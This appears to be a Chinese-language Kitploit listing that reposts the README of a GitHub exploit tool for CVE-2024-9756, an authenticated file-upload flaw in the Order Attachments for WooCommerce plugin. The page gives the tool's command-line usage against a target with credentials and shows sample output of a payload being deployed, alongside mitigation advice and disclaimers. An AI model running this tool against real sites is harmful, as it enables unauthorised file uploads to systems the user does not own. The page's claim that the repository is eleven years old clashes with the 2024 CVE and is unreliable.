Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9756 — Order Attachments for WooCommerce 2.0 - 2.4.1 - 缺少授权导致已认证(订阅者+)有限任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-9756
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubnxploited/cve-2024-9756

CVE-2024-9756

Order Attachments for WooCommerce 2.0 - 2.4.1 - 缺少授权导致已认证(订阅者+)有限任意文件上传

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚀 WooCommerce 任意文件上传漏洞利用 (CVE-2024-9756)

📌 概述

此漏洞利用利用了 WordPress 的 Order Attachments for WooCommerce 插件(版本 2.0 至 2.4.1)中的一个 未授权有限任意文件上传漏洞。
该漏洞允许 经过身份验证的用户(订阅者及以上) 在未经适当授权的情况下上传受限文件类型。

⚠️ 免责声明

此脚本仅用于教育和安全研究目的。 任何在非自有系统上未经授权使用此漏洞的行为均严格违法。


🔗 CVE 详情

  • CVE ID: CVE-2024-9756
  • 受影响插件: Order Attachments for WooCommerce
  • 受影响版本: 2.0 至 2.4.1
  • 漏洞类型: 授权缺失导致已验证用户任意文件上传
  • 利用前提: 拥有至少“订阅者”角色的有效 WordPress 登录
  • 潜在影响: 可被用于进一步利用的有限文件上传。

⚙️ 要求

在运行漏洞利用之前,请确保已满足以下条件:

✅ 依赖项

  • Python 3.x
  • requests 模块 → 使用以下命令安装:
    root@kitploit:~
    pip install requests
    
  • 目标 WordPress 站点已安装易受攻击的插件。

✅ WordPress 用户权限

  • 需要 订阅者及以上 访问权限才能利用。

🚀 漏洞利用方法

🔹 运行漏洞利用脚本

root@kitploit:~
python3 CVE-2024-9756.py -u <目标URL> -un <用户名> -p <密码>

示例:

root@kitploit:~
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword

🔧 高级用法

您可以指定 自定义文件名 和 订单 ID:

🔹 上传特定文件

root@kitploit:~
python3 CVE-2024-9756.py -u <目标URL> -un <用户名> -p <密码> --filename="custom.png" --filetype="image/png"

🔹 将文件附加到其他订单 ID

root@kitploit:~
python3 CVE-2024-9756.py -u <目标URL> -un <用户名> -p <密码> -o 200

📌 脚本行为

  1. 使用提供的凭据向 WordPress 进行身份验证。
  2. 在上传前验证文件是否存在于本地。
  3. 通过易受攻击的 AJAX 端点执行文件上传利用。
  4. 解析服务器响应并提取上传文件的 URL。

✅ 预期输出

如果成功,脚本将返回上传文件的 URL:

root@kitploit:~
[*] 正在发起身份验证...
[✔] 身份验证成功。
[*] 正在将载荷 Nxploit.jpg 部署到订单 196...
[✔] 载荷部署成功!
🔗 文件 URL:http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg

🔥 修复与缓解措施

  • 升级插件 到最新的修复版本。
  • 将文件上传权限限制为仅管理员。
  • 修改 functions.php,阻止未经授权的用户访问 wp_ajax_wcoa_add_attachment:
    root@kitploit:~
    if (!current_user_can('manage_woocommerce')) {
        wp_send_json_error(['message' => 'Unauthorized'], 403);
        exit;
    }
    

🛑 法律声明

此漏洞利用发布仅用于教育目的和安全研究。
未经明确许可在非自有系统上未经授权使用是违法的,并将受到网络安全法律的惩处。
使用风险自负。


下载工具